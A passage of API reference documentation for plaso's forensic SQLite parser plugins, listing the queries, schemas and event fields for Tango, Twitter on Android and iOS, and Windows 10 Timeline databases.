DATA_FORMAT = 'Tango on Android profile SQLite database file'

NAME = 'tango_android_profile'

ParseContactRow(parser_mediator, query, row, **unused_kwargs)Parses a contact row from the database.

Parameters






QUERIES = [('SELECT itemLastActiveTime AS last_active_time, itemLastLocalAccessTime AS last_access_time, itemFriendRequestTime AS friend_request_time, itemFirstName AS first_name, itemLastName AS last_name, itemBirthday AS birthday, itemGender AS gender, itemStatus AS status, itemDistance AS distance, itemIsFriend AS friend, itemFriendRequestType AS friend_request_type, itemFriendRequestMessage AS friend_request_message FROM profiletable', 'ParseContactRow')]

REQUIRED_STRUCTURE = {'profiletable': frozenset({'itemBirthday', 'itemDistance', 'itemFirstName', 'itemFriendRequestMessage', 'itemFriendRequestTime', 'itemFriendRequestType', 'itemGender', 'itemIsFriend', 'itemLastActiveTime', 'itemLastLocalAccessTime', 'itemLastName', 'itemStatus'})}

SCHEMAS = [{'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'profiletable': 'CREATE TABLE `profiletable` (ìtemUserId` TEXT PRIMARY KEY, ìtemFirstName` TEXT NOT NULL, ìtemLastName` TEXT NOT NULL, ìtemBirthday` TEXT NOT NULL, ìtemGender` TEXT NOT NULL, ìtemStatus` TEXT NOT NULL, ìtemLastActiveTime` BIGINT NOT NULL, ìtemDistance` DOUBLE NOT NULL, ìtemCity` TEXT NOT NULL, ìtemGeoCountryCode` TEXT NOT NULL, ìtemAvatarUrl` TEXT NOT NULL, ìtemThumbnailUrl` TEXT NOT NULL, ìtemVideoUrl` TEXT NOT NULL, ìtemVideoThumbnailUrl` TEXT NOT NULL, ìtemBackgroundUrl` TEXT NOT NULL, ìtemIsFriend` INTEGER NOT NULL, ìtemIsBlocked` INTEGER NOT NULL, ìtemFriendRequestType` TEXT NOT NULL, ìtemReverseRelationships` TEXT NOT NULL, ìtemFavoriterCount` INTEGER NOT NULL, ìtemFavoritingCount` INTEGER NOT NULL, ìtemFeedCount` INTEGER NOT NULL, ìtemRefereneCount` INTEGER NOT NULL, ìtemLevel1DataSyncTime` BIGINT NOT NULL, ìtemLevel2DataSyncTime` BIGINT NOT NULL, ìtemLevel3DataSyncTime` BIGINT NOT NULL, ìtemLevel4DataSyncTime` BIGINT NOT NULL, ìtemLevel5DataSyncTime` BIGINT NOT NULL, ìtemLastLocalAccessTime` BIGINT NOT NULL, ìtemFriendRequestId` TEXT NOT NULL, ìtemFriendRequestMessage` TEXT NOT NULL, ìtemFriendRequestTime` BIGINT NOT NULL, ìtemIsNewFriendRequest` INTEGER NOT NULL, ìtemFriendRequestTCMessageId` INTEGER NOT NULL, ìtemFriendRequestContext` TEXT NOT NULL, ìtemFriendRequestAttachedPostType` INTEGER NOT NULL, ìtemFriendRequestAttachedPostContent` TEXT NOT NULL, ìtemFriendRequestHasBeenForwardedToTc` INTEGER NOT NULL, ìtemProfileType` TEXT NOT NULL, ìtemDatingAge` INTEGER NOT NULL, ìtemDatingLocationString` TEXT NOT NULL, ìtemDatingSeekingString` TEXT NOT NULL, ìtemDatingEssayText` TEXT NOT NULL, ìtemDatingBodyType` TEXT NOT NULL, ìtemDatingLastActive` TEXT NOT NULL, ìtemDatingProfileUrl` TEXT NOT NULL, ìtemLastTimeOfLikeProfile` BIGINT NOT NULL, ìtemIsHidden` INTEGER NOT NULL, ìtemPrivacy` INTEGER NOT NULL, ìtemCanSeeMyPost` INTEGER NOT NULL, ìtemCanShareMyPost` INTEGER NOT NULL, ìtemCanContactMe` INTEGER NOT NULL)'}]

class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Tango on Android TC database files.

DATA_FORMAT = 'Tango on Android TC SQLite database file'

NAME = 'tango_android_tc'

ParseConversationRow(parser_mediator, query, row, **unused_kwargs)Parses a conversation row from the database.

Parameters




ParseMessageRow(parser_mediator, query, row, **unused_kwargs)Parses a message row from the database.

Parameters




QUERIES = [('SELECT conversations.conv_id AS conv_id, conversations.payload AS payload FROM conversations', 'ParseConversationRow'), ('SELECT messages.create_time AS create_time, messages.send_time AS send_time, messages.msg_id AS msg_id, messages.payload AS payload, messages.direction AS direction FROM messages LEFT JOIN likes ON messages.msg_id = likes.msg_id', 'ParseMessageRow')]

REQUIRED_STRUCTURE = {'conversations': frozenset({'conv_id', 'payload'}), 'likes': frozenset({'msg_id'}), 'messages': frozenset({'create_time', 'direction', 'msg_id', 'payload', 'send_time'})}

SCHEMAS = [{'conversations': 'CREATE TABLE `conversations` (`conv_id` TEXT PRIMARY KEY, `conv_type` INTEGER DEFAULT 0, `payload` BLOB, `last_msg_id` INTEGER, ùnread_count` INTEGER, `last_read_sent_msg_id` INTEGER, `conv_del_status` INTEGER DEFAULT 0, `deleting_ts` BIGINT DEFAULT 0, `conv_restore_status` INTEGER DEFAULT 0, `peers_read` TEXT, `total_received_msg_count` INTEGER DEFAULT -1, `communication_context` INTEGER DEFAULT 0)', 'games': 'CREATE TABLE `games` (`game_session_id` TEXT PRIMARY KEY, `message_id` INTEGER, `conversation_id` TEXT, `game_id` TEXT, `game_state` INTEGER, àction_timestamp` BIGINT, `current_player_account_id` TEXT)', 'likes': 'CREATE TABLE `likes` (`msg_id` INTEGER PRIMARY KEY, `global_msg_id` TEXT, `conv_id` TEXT, `liker_aid` TEXT, àct_type` INTEGER, `status` INTEGER, àct_ts` BIGINT, `payload` BLOB)', 'messages': 'CREATE TABLE `messages` (`msg_id` INTEGER PRIMARY KEY, `conv_id` TEXT, `type` INTEGER, `media_id` TEXT, `share_id` TEXT, `create_time` BIGINT, `send_time` BIGINT, `direction` INTEGER, `status` INTEGER, `payload` BLOB, `del_status` INTEGER)', 'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'receipts': 'CREATE TABLE `receipts` (`conv_id` TEXT PRIMARY KEY, `msg_id` INTEGER, `sender_msg_id` INTEGER, `sender_aids` TEXT, `type` INTEGER, `create_time` BIGINT, `status` INTEGER, `payload` BLOB)', 'sms': 'CREATE TABLE `sms` (`msg_id` INTEGER PRIMARY KEY, `phonenumber` TEXT, `text` TEXT)'}]

plaso.parsers.sqlite_plugins.twitter_android module

SQLite parser plugin for Twitter on Android database files.

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataBases: plaso.containers.events.EventData

Twitter on Android contact event data.

identifiercontact row id.

Type int

user_identifiertwitter account id.

Type int

usernametwitter account handler.



Type str

nametwitter account name.

Type str

descriptiontwitter account profile description.

Type str

web_urltwitter account profile url content.

Type str

locationtwitter account profile location content.

Type str

followersnumber of followers.

Type int

friendsnumber of following.

Type int

statusestwitter account number of tweets.

Type int

image_urlprofile picture url.

Type str

DATA_TYPE = 'twitter:android:contact'

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Twitter on Android database files.

DATA_FORMAT = 'Twitter on Android SQLite database file'

NAME = 'twitter_android'

ParseContactRow(parser_mediator, query, row, **unused_kwargs)Parses a status row from the database.

Parameters




ParseSearchRow(parser_mediator, query, row, **unused_kwargs)Parses a search row from the database.



Parameters




ParseStatusRow(parser_mediator, query, row, **unused_kwargs)Parses a status row from the database.

Parameters




QUERIES = [('SELECT name, query, time FROM search_queries', 'ParseSearchRow'), ('SELECT statuses._id AS _id, statuses.author_id AS author_id, users.username AS username, statuses.content AS content, statuses.created AS time, statuses.favorited AS favorited, statuses.retweeted AS retweeted FROM statuses LEFT JOIN users ON statuses.author_id = users.user_id', 'ParseStatusRow'), ('SELECT _id, user_id, username, name, profile_created, description, web_url, location, followers, friends, statuses, image_url, updated, friendship_time FROM users', 'ParseContactRow')]

REQUIRED_STRUCTURE = {'search_queries': frozenset({'name', 'query', 'time'}), 'statuses': frozenset({'_id', 'author_id', 'content', 'created', 'favorited', 'retweeted'}), 'users': frozenset({'_id', 'description', 'followers', 'friends', 'friendship_time', 'image_url', 'location', 'name', 'profile_created', 'statuses', 'updated', 'user_id', 'username', 'web_url'})}

SCHEMAS = [{'activities': 'CREATE TABLE activities (_id INTEGER PRIMARY KEY,type INT,event INT,created_at INT,hash INT,max_position INT,min_position INT,sources_size INT,source_type INT,sources BLOB,targets_size INT,target_type INT,targets BLOB,target_objects_size INT,target_object_type INT,target_objects BLOB,is_last INT,tag INT,magic_rec_id INT,UNIQUE (type, max_position) ON CONFLICT REPLACE)', 'ads_account_permissions': 'CREATE TABLE ads_account_permissions (_id INTEGER PRIMARY KEY,promotable_users BLOB,last_synced INT NOT NULL)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'business_profiles': 'CREATE TABLE business_profiles (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,business_profile BLOB,last_synced INT NOT NULL)', 'card_state': 'CREATE TABLE card_state (_id INTEGER PRIMARY KEY AUTOINCREMENT,card_status_id INT,card_id INT, card_state BLOB)', 'category_timestamp': 'CREATE TABLE category_timestamp (_id INTEGER PRIMARY KEY,cat_status_id INT NOT NULL,cat_tag INT NOT NULL,cat_timestamp INT NOT NULL)', 'clusters': 'CREATE TABLE clusters (_id INTEGER PRIMARY KEY,cl_cluster_id TEXT UNIQUE NOT NULL,cl_type INT,cl_title TEXT,cl_subtitle TEXT,cl_size INT,cl_timestamp INT,cl_content BLOB)', 'conversation_entries': 'CREATE TABLE conversation_entries (_id INTEGER PRIMARY KEY,entry_id INT UNIQUE NOT NULL,sort_entry_id INT UNIQUE NOT NULL,conversation_id TEXT,user_id INT,created INT,entry_type INT,data BLOB,request_id TEXT)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY,conversation_id TEXT NOT NULL,user_id TEXT NOT NULL,join_time INT NOT NULL,participant_type INT NOT NULL)', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY,conversation_id TEXT UNIQUE NOT NULL,title TEXT,avatar_url TEXT,type INT,sort_event_id BIGINT,last_readable_event_id BIGINT,last_read_event_id BIGINT,sort_timestamp BIGINT,is_muted INT,min_event_id BIGINT,is_hidden INT,has_more INT,read_only INT)', 'cursors': 'CREATE TABLE cursors (_id INTEGER PRIMARY KEY,kind INT,type INT,owner_id INT,ref_id TEXT,next TEXT)', 'dismiss_info': 'CREATE TABLE dismiss_info(timeline_id INTEGER REFERENCES timeline(_id),feedback_action_id INTEGER REFERENCES feedback_action(_id),UNIQUE(timeline_id,feedback_action_id))', 'feedback_action': 'CREATE TABLE feedback_action(_id INTEGER PRIMARY KEY AUTOINCREMENT,feedback_type TEXT,prompt TEXT,confirmation TEXT,UNIQUE(feedback_type,prompt,confirmation))', 'list_mapping': 'CREATE TABLE list_mapping (_id INTEGER PRIMARY KEY,list_mapping_list_id TEXT,list_mapping_type INT,list_mapping_user_id INT,list_is_last INT)', 'locations': 'CREATE TABLE locations (_id INTEGER PRIMARY KEY,name TEXT,woeid INT,country TEXT,country_code TEXT)', 'moments': 'CREATE TABLE moments (_id INTEGER PRIMARY KEY,title TEXT NOT NULL,can_subscribe INT,is_live INT,is_sensitive INT,subcategory_string TEXT,subcategory_favicon_url TEXT,time_string TEXT,duration_string TEXT,is_subscribed INT,description TEXT NOT NULL,moment_url TEXT,num_subscribers INT,author_info BLOB,promoted_content BLOB)', 'moments_guide': 'CREATE TABLE moments_guide (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,section_id INT NOT NULL,tweet_id INT NOT NULL, crop_data BLOB,media_id INT,media_url TEXT,media_size BLOB,FOREIGN KEY(section_id) REFERENCES moments_sections(_id) ON DELETE CASCADE)', 'moments_guide_categories': 'CREATE TABLE moments_guide_categories (_id INTEGER PRIMARY KEY,category_id TEXT NOT NULL,is_default_category INT NOT NULL,category_name TEXT NOT NULL,fetch_timestamp INT NOT NULL)', 'moments_guide_user_states': 'CREATE TABLE moments_guide_user_states (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,is_read INT,is_updated INT,FOREIGN KEY(moment_id) REFERENCES moments(_id) ON DELETE CASCADE)', 'moments_pages': 'CREATE TABLE moments_pages (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,page_id TEXT,type BLOB,tweet_id INT,display_mode BLOB,page_number INT,crop_data BLOB,theme_data BLOB,media_id INT,media_size BLOB,media_url TEXT,last_read_timestamp INT,FOREIGN KEY(moment_id) REFERENCES moments(_id))', 'moments_sections': 'CREATE TABLE moments_sections (_id INTEGER PRIMARY KEY,section_title TEXT,section_type BLOB NOT NULL,section_group_id TEXT,section_group_type INT NOT NULL)', 'moments_visit_badge': 'CREATE TABLE moments_visit_badge (_id INTEGER PRIMARY KEY,moment_id INT UNIQUE NOT NULL,is_new_since_visit INT,is_updated_since_visit INT)', 'news': 'CREATE TABLE news (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,topic_id INT,news_id TEXT,title TEXT,image_url TEXT,author_name TEXT,article_description TEXT,article_url TEXT,tweet_count INT,start_time INT,news_id_hash INT)', 'notifications': 'CREATE TABLE notifications (_id INTEGER PRIMARY KEY,type INT,notif_id INT,source_user_name TEXT,s_name TEXT,s_id INT,notif_txt TEXT,aggregation_data TEXT,notif_extra_data BLOB)', 'one_click': 'CREATE TABLE one_click (_id INTEGER PRIMARY KEY,topic TEXT,filter_name TEXT,filter_location TEXT,filter_follow INT)', 'order_history': 'CREATE TABLE order_history (_id INTEGER PRIMARY KEY,ordered_at INT ,order_id INT ,data BLOB)', 'promoted_retry': 'CREATE TABLE promoted_retry(impression_id TEXT,event INT NOT NULL,is_earned INT NOT NULL,trend_id INT,num_retries INT NOT NULL,url TEXT,video_playlist_url TEXT,video_content_uuid TEXT,video_content_type TEXT,video_cta_url TEXT,video_cta_app_id TEXT,video_cta_app_name TEXT,card_event TEXT,PRIMARY KEY(impression_id,event,is_earned,trend_id))', 'prompts': 'CREATE TABLE prompts (_id INTEGER PRIMARY KEY,p_id INT,p_format TEXT,p_template TEXT,p_header TEXT,p_text TEXT,p_action_text TEXT,p_action_url TEXT,p_icon TEXT,p_background_image_url TEXT,p_persistence TEXT,p_entities BLOB,p_header_entities BLOB,p_status_id LONG,p_insertion_index INT,p_trigger TEXT)', 'rankings': 'CREATE TABLE rankings (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,granularity TEXT,category TEXT,date INT)', 'search_queries': 'CREATE TABLE search_queries (_id INTEGER PRIMARY KEY,type INT,name TEXT NOT NULL,query TEXT NOT NULL,query_id INT,time INT,latitude REAL,longitude REAL,radius REAL,location TEXT,pc BLOB,cluster_titles BLOB)', 'search_results': 'CREATE TABLE search_results (_id INTEGER PRIMARY KEY,search_id INT,s_type INT,data_type INT,type_id INT,polled INT,data_id INT,related_data BLOB,cluster_id INT)', 'search_suggestion_metadata': 'CREATE TABLE search_suggestion_metadata (_id INTEGER PRIMARY KEY,type INT,last_update LONG)', 'status_groups': 'CREATE TABLE status_groups (_id INTEGER PRIMARY KEY,tweet_type INT DEFAULT 0,type INT,sender_id INT,owner_id INT,ref_id INT,tag INT,g_status_id INT,is_read INT,page INT,is_last INT,updated_at INT,timeline INT,pc BLOB,g_flags INT,preview_draft_id INT,preview_media BLOB,tweet_pivots BLOB)', 'status_metadata': 'CREATE TABLE status_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,status_id INT NOT NULL,status_group INT NOT NULL,status_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_second_name TEXT,soc_others_count INT,soc_fav_count INT,soc_rt_count INT,reason_icon_type TEXT,reason_text TEXT,scribe_component TEXT,scribe_data BLOB,highlights TEXT)', 'statuses': 'CREATE TABLE statuses (_id INTEGER PRIMARY KEY,status_id INT UNIQUE NOT NULL,author_id INT,content TEXT,source TEXT,created INT,in_r_user_id INT,in_r_status_id INT,favorited INT,latitude TEXT,longitude TEXT,place_data BLOB,entities TEXT,retweet_count INT,r_content TEXT,cards BLOB,flags INT,favorite_count INT,lang TEXT,supplemental_language TEXT,view_count INT,quoted_tweet_data BLOB,quoted_tweet_id INT,retweeted INT)', 'stories': 'CREATE TABLE stories ( _id INTEGER PRIMARY KEY,story_id TEXT,story_order INT,story_type INT,story_proof_type INT,story_proof_addl_count INT,data_type INT,data_id INT,story_is_read INT,story_meta_title TEXT,story_meta_subtitle TEXT,story_meta_query TEXT,story_meta_header_img_url TEXT,story_source TEXT,story_impression_info TEXT,story_tag INT)', 'timeline': 'CREATE TABLE timeline (_id INTEGER PRIMARY KEY AUTOINCREMENT,owner_id INT,type INT,sort_index INT,entity_id INT,entity_type INT,data_type INT,data_type_group INT,data_type_tag INT,timeline_tag TEXT,timeline_group_id INT,timeline_scribe_group_id INT,data_id INT,data BLOB,flags INT,updated_at INT,data_origin_id TEXT,is_last INT,is_read INT,scribe_content BLOB,timeline_moment_info BLOB,dismissed INT NOT NULL DEFAULT 0,dismiss_actions INT NOT NULL DEFAULT 0)', 'tokens': 'CREATE TABLE tokens (_id INTEGER PRIMARY KEY,text TEXT,weight INT,type INT,ref_id INT)', 'topics': 'CREATE TABLE topics (_id INTEGER PRIMARY KEY,ev_id TEXT UNIQUE NOT NULL,ev_type INT,ev_query TEXT NOT NULL,ev_seed_hashtag TEXT,ev_title STRING,ev_subtitle STRING,ev_view_url STRING,ev_status STRING,ev_image_url TEXT,ev_explanation TEXT,ev_tweet_count INT,ev_start_time INT,ev_owner_id INT,ev_pc BLOB,ev_content BLOB,ev_hash INT)', 'user_groups': 'CREATE TABLE user_groups (_id INTEGER PRIMARY KEY,type INT,tag INT,rank INT,owner_id INT,user_id INT,is_last INT,pc BLOB,g_flags INT)', 'user_metadata': 'CREATE TABLE user_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,user_id INT NOT NULL,user_group_type INT NOT NULL,user_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_follow_count INT,user_title TEXT,token TEXT)', 'users': 'CREATE TABLE users (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,username TEXT,name TEXT,description TEXT,web_url TEXT,bg_color INT,location TEXT,structured_location BLOB,user_flags INT,followers INT,fast_followers INT DEFAULT 0,friends INT,statuses INT,profile_created INT,image_url TEXT,hash INT,updated INT,friendship INT,friendship_time INT,favorites INT DEFAULT 0,header_url TEXT,description_entities BLOB,url_entities BLOB,media_count INT,extended_profile_fields BLOB,pinned_tweet_id INT,link_color INT,advertiser_type TEXT,business_profile_state TEXT)'}]

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventDataBases: plaso.containers.events.EventData

Twitter on Android search event data.

nametwitter name handler.

Type str

search_querysearch query.

Type str

DATA_TYPE = 'twitter:android:search'

class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDataBases: plaso.containers.events.EventData

Twitter on Android status event data.

identifierstatus row identifier.

Type int

author_identifiertwitter account identifier.

Type int

usernametwitter account handler.

Type str

contentstatus content.

Type str



favoritedfavorited flag as 0/1 value.

Type int

retweetedretweeted flag as 0/1 value.

Type int

DATA_TYPE = 'twitter:android:status'

plaso.parsers.sqlite_plugins.twitter_ios module

SQLite parser plugin for Twitter on iOS 8+ database files.

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataBases: plaso.containers.events.EventData

Twitter on iOS 8+ contact event data.

descriptiondescription of the profile.

Type str

followers_countnumber of accounts following the contact.

Type int

following_countnumber of accounts the contact is following.

Type int

following1 if the contact is following the user’s account, 0 if not.

Type int

locationlocation of the profile.

Type str

namename of the profile.

Type str

profile_urlURL of the profile picture.

Type str

screen_namescreen name.

Type str

urlURL of the profile.

Type str



DATA_TYPE = 'twitter:ios:contact'

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Twitter on iOS 8+ database files.

The Twitter on iOS 8+ database file is typically stored in: /pri-vate/var/mobile/Containers/Data/Application/Library/Caches/databases/ twitter.db

DATA_FORMAT = 'Twitter on iOS 8 and later SQLite database (twitter.db) file'

NAME = 'twitter_ios'

ParseContactRow(parser_mediator, query, row, **unused_kwargs)Parses a contact row from the database.

Parameters




ParseStatusRow(parser_mediator, query, row, **unused_kwargs)Parses a contact row from the database.

Parameters




QUERIES = [('SELECT createdDate, updatedAt, screenName, name, profileImageUrl,location, description, url, following, followersCount, followingCount FROM Users ORDER BY createdDate', 'ParseContactRow'), ('SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId AS user_id, Users.name AS name, Statuses.retweetCount AS retweetCount, Statuses.favoriteCount AS favoriteCount, Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER BY date', 'ParseStatusRow')]

REQUIRED_STRUCTURE = {'Statuses': frozenset({'date', 'favoriteCount', 'favorited', 'retweetCount', 'text', 'updatedAt', 'userId'}), 'Users': frozenset({'createdDate', 'description', 'followersCount', 'following', 'followingCount', 'id', 'location', 'name', 'profileImageUrl', 'screenName', 'updatedAt', 'url'})}

SCHEMAS = [{'Lists': "CREATE TABLE Lists ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'ListsShadow': "CREATE TABLE ListsShadow ( 'id' INTEGER PRIMARY KEY, 'name' TEXT, 'slug' TEXT, 'desc' TEXT, 'private' INTEGER, 'subscriberCount' INTEGER, 'memberCount' INTEGER, 'userId' INTEGER, 'updatedAt' REAL )", 'MyRetweets': "CREATE TABLE MyRetweets ( 'statusId' INTEGER PRIMARY KEY, 'myRetweetId' INTEGER )", 'Statuses': "CREATE TABLE Statuses ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplmentalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'StatusesShadow': "CREATE TABLE StatusesShadow ( 'id' INTEGER PRIMARY KEY, 'text' TEXT, 'date' REAL, 'userId' INTEGER, 'inReplyToStatusId' INTEGER, 'retweetedStatusId' INTEGER, 'geotag' BLOB, 'entities' BLOB, 'card' BLOB, 'cardUsers' BLOB, 'primaryCardType' INTEGER, 'cardVersion' INTEGER, 'retweetCount' INTEGER, 'favoriteCount' INTEGER, 'favorited' INTEGER, 'updatedAt' REAL, 'extraScribeItem' BLOB, 'withheldScope' TEXT, 'withheldInCountries' TEXT, 'inReplyToUsername' TEXT, 'possiblySensitive' INTEGER, 'isPossiblySensitiveAppealable' INTEGER, 'isLifelineAlert' INTEGER, 'isTruncated' INTEGER, 'previewLength' INTEGER, 'fullTextLength' INTEGER, 'lang' TEXT, 'supplementalLanguage' TEXT, 'includeInProfileTimeline' INTEGER, 'quotedStatusId' INTEGER, 'source' TEXT )", 'Users': "CREATE TABLE Users ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )", 'UsersShadow': "CREATE TABLE UsersShadow ( 'id' INTEGER PRIMARY KEY, 'screenName' TEXT COLLATE NOCASE, 'profileImageUrl' TEXT, 'profileBannerUrl' TEXT, 'profileLinkColorHexTriplet' INTEGER, 'name' TEXT, 'location' TEXT, 'structuredLocation' BLOB, 'description' TEXT, 'url' TEXT, 'urlEntities' BLOB, 'bioEntities' BLOB, 'protected' INTEGER, 'verified' INTEGER, 'following' INTEGER, 'deviceFollowing' INTEGER, 'advertiserAccountType' INTEGER, 'statusesCount' INTEGER, 'mediaCount' INTEGER, 'favoritesCount' INTEGER, 'followingCount' INTEGER, 'followersCount' INTEGER, 'followersCountFast' INTEGER, 'followersCountNormal' INTEGER, 'couldBeStale' INTEGER, 'isLifelineInstitution' INTEGER, 'hasCollections' INTEGER, 'updatedAt' REAL, 'createdDate' REAL, 'isTranslator' INTEGER, 'hasExtendedProfileFields' INTEGER, 'extendedProfileFields' BLOB, 'pinnedTweetId' INTEGER, 'businessProfileState' INTEGER, 'analyticsType' INTEGER )"}]

class plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventDataBases: plaso.containers.events.EventData

Parent class for Twitter on iOS 8+ status events.

favorite_countnumber of times the status message has been favorited.

Type int

favoritedvalue to mark status as favorite by the account.

Type int

nameuser’s profile name.

Type str

retweet_countnumber of times the status message has been retweeted.

Type str



textcontent of the status message.

Type str

user_iduser unique identifier.

Type int

DATA_TYPE = 'twitter:ios:status'

plaso.parsers.sqlite_plugins.windows_timeline module

SQLite parser plugin for Windows 10 Timeline database files.

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventDataBases: plaso.containers.events.EventData

Windows Timeline database generic event data.

package_identifierthe package ID or path to the executable run. Depending on the program, this eitherlooks like a path (for example, c:python34python.exe) or like a package name (for exampleDocker.DockerForWindows.Settings).

Type str

descriptionthis is an optional field, used to describe the action in the timeline view, and is usually populated with thepath of the file currently open in the program described by package_identifier. Otherwise None.

Type str

application_display_namea more human-friendly version of the package_identifier, such as ‘Docker for Windows’ or ‘MicrosoftStore’.

Type str

DATA_TYPE = 'windows:timeline:generic'

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Windows 10 Timeline database files.

The Windows 10 Timeline database file is typically stored in: %APP-DATA%LocalConnectedDevicesPlatformL.<username>ActivitiesCache.db

DATA_FORMAT = 'Windows 10 Timeline SQLite database (ActivitiesCache.db) file'

NAME = 'windows_timeline'

ParseGenericRow(parser_mediator, query, row, **unused_kwargs)Parses a generic windows timeline row.

Args: parser_mediator (ParserMediator): mediates interactions between parsers

and other components, such as storage and dfvfs.

query (str): query that created the row. row (sqlite3.Row): row.



ParseUserEngagedRow(parser_mediator, query, row, **unused_kwargs)Parses a timeline row that describes a user interacting with an app.

Parameters




QUERIES = [('SELECT StartTime, Payload, PackageName FROM Activity INNER JOIN Activity_PackageId ON Activity.Id = Activity_PackageId.ActivityId WHERE instr(Payload, "UserEngaged") > 0 AND Platform = "packageid"', 'ParseUserEngagedRow'), ('SELECT StartTime, Payload, AppId FROM Activity WHERE instr(Payload, "UserEngaged") = 0', 'ParseGenericRow')]

REQUIRED_STRUCTURE = {'Activity': frozenset({'AppId', 'Id', 'PackageName', 'Payload', 'StartTime'}), 'Activity_PackageId': frozenset({'ActivityId'})}

SCHEMAS = [{'Activity': 'CREATE TABLE [Activity]([Id] GUID PRIMARY KEY NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ActivityStatus] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [IsLocalOnly] INT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'ActivityAssetCache': 'CREATE TABLE [ActivityAssetCache]([ResourceId] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, [AppId] TEXT NOT NULL, [AssetHash] TEXT NOT NULL, [TimeToLive] DATETIME NOT NULL, [AssetUri] TEXT, [AssetId] TEXT, [AssetKey] TEXT, [Contents] BLOB)', 'ActivityOperation': 'CREATE TABLE [ActivityOperation]([OperationOrder] INTEGER PRIMARY KEY ASC NOT NULL, [Id] GUID NOT NULL, [OperationType] INT NOT NULL, [AppId] TEXT NOT NULL, [PackageIdHash] TEXT, [AppActivityId] TEXT, [ActivityType] INT NOT NULL, [ParentActivityId] GUID, [Tag] TEXT, [Group] TEXT, [MatchId] TEXT, [LastModifiedTime] DATETIME NOT NULL, [ExpirationTime] DATETIME, [Payload] BLOB, [Priority] INT, [CreatedTime] DATETIME, [Attachments] 